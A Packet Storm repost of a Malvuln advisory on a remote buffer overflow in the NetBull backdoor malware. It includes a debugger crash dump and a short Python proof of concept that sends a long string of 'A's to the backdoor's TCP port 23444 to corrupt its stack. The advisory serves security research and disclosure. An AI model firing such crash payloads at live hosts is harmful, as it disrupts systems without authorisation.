what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Backdoor.Win32.NetBull.11.a MVID-2021-0035 Remote Buffer Overflow

Backdoor.Win32.NetBull.11.a MVID-2021-0035 Remote Buffer Overflow
Posted Jan 19, 2021
Authored by malvuln | Site malvuln.com

Backdoor.Win32.NetBull.11.a malware suffers from a remote buffer overflow vulnerability.

tags | exploit, remote, overflow
systems | windows
SHA-256 | 584db4aa7f169386ff9e577fd48f0287bb44f90471a6ff206f2f1da3d4561c6d

Backdoor.Win32.NetBull.11.a MVID-2021-0035 Remote Buffer Overflow

Change Mirror Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/80e98fdf726a3e727f3414bdbf2e86bb.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.NetBull.11.a
Vulnerability: Remote Buffer Overflow
Description: Netbull listens on both TCP ports 23444 and 23445, sending a large string of junk chars causes stack corruption overwriting EDX register.
Type: PE32
MD5: 80e98fdf726a3e727f3414bdbf2e86bb
Vuln ID: MVID-2021-0035
Dropped files: c:\infected.exe
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/18/2021

Memory Dump:
EAX : 70D87B24 mfc42.70D87B24
EBX : FFFFFFFF
ECX : 2E240010
EDX : 41414140
EBP : 028F86A8
ESP : 0019F8C4
ESI : 2E240000
EDI : 3FFFFFC2
EIP : 70CA85D5 mfc42.70CA85D5


(1a2c.13f4): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=2e05f010 edx=41414140 esi=00000003 edi=00000003
eip=773ced3c esp=0019ef84 ebp=0019f114 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
ntdll!ZwWaitForMultipleObjects+0xc:
773ced3c c21400 ret 14h


0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************


FAULTING_IP:
mfc42!CString::CString+5
73c685d5 8901 mov dword ptr [ecx],eax

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 73c685d5 (mfc42!CString::CString+0x00000005)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 2e05f010
Attempt to write to address 2e05f010

PROCESS_NAME: Backdoor.Win32.NetBull.11.a.80e98fdf726a3e727f3414bdbf2e86bb.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000001

EXCEPTION_PARAMETER2: 2e05f010

WRITE_ADDRESS: 2e05f010

FOLLOWUP_IP:
mfc42!CString::CString+5
73c685d5 8901 mov dword ptr [ecx],eax

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 000013f4

BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_ffffffff

PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_ffffffff

DEFAULT_BUCKET_ID: INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_ffffffff

LAST_CONTROL_TRANSFER: from 00407f45 to 73c685d5

STACK_TEXT:
0019f8c0 00407f45 2e05f000 2e05f000 0019f8ec mfc42!CString::CString+0x5
WARNING: Stack unwind information not available. Following frames may be wrong.
0019f8d8 00407efb 043448fc 41414141 0019f9bc Backdoor_Win32_NetBull_11_a_80e98fdf726a3e727f3414bdbf2e86bb+0x7f45
0019f8f4 00407408 2e05f000 2e05f000 00000001 Backdoor_Win32_NetBull_11_a_80e98fdf726a3e727f3414bdbf2e86bb+0x7efb
00000000 00000000 00000000 00000000 00000000 Backdoor_Win32_NetBull_11_a_80e98fdf726a3e727f3414bdbf2e86bb+0x7408


SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: mfc42!CString::CString+5

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: mfc42

IMAGE_NAME: mfc42.dll



Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=23444

def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))

PACKET="A"*666

s.send(PACKET)
s.close()
print("Backdoor.Win32.NetBull.11.a / Remote Buffer Overflow");
print("MD5: 80e98fdf726a3e727f3414bdbf2e86bb");
print("By Malvuln");

if __name__=="__main__":
doit()


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close